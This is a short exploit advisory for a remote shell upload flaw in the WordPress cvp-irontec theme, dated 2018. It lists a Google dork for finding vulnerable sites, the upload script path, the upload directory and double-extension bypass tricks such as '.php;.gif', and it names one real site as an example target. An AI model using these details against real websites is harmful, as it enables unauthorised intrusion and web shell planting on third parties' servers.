WordPress cvp-irontec Themes 4.8.3 Remote Shell Upload Vuln

1. #####################################################################
2.  
3. # Exploit Title : WordPress cvp-irontec Themes 4.8.3 Remote Shell Upload Vulnerability
4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
5. # Date : 22/12/2018
6. # Vendor Homepage : wordpress.org
7. # Software Download Link : N/A
8. # Tested On : Windows and Linux
9. # Category : WebApps
10. # Version Information : V4.8.3 ~ Apache 2.4.10 ~ jQuery 1.8.3 ~ jQuery UI 1.8.18
11. # Exploit Risk : Medium
12. # Google Dorks : inurl:''/wp-content/themes/cvp-irontec/''
13. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
14. + CWE-434- [ Unrestricted Upload of File with Dangerous Type ]
15.  
16. #####################################################################
17.  
18. # Admin Panel Login Path :
19.  
20. /wp-login.php
21.  
22. # Exploit :
23.  
24. /wp-content/themes/cvp-irontec/_inc/din-upload/din-upload.php
25.  
26. # Directory File Path :
27.  
28. /wp-content/uploads/avatars/signups/avatar_[RANDOM-NUMBERS]-bpfull.jpeg
29.  
30. # Note : .php;.gif ~ .asp;.png ~ .shtml.fla;.jpeg
31.  
32. #####################################################################
33.  
34. # Example Vulnerable Site =>
35.  
36. [+] kronikoensarea.net/wp-content/themes/cvp-irontec/_inc/din-upload/din-upload.php
37.  
38. #####################################################################
39.  
40. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
41.  
42. #####################################################################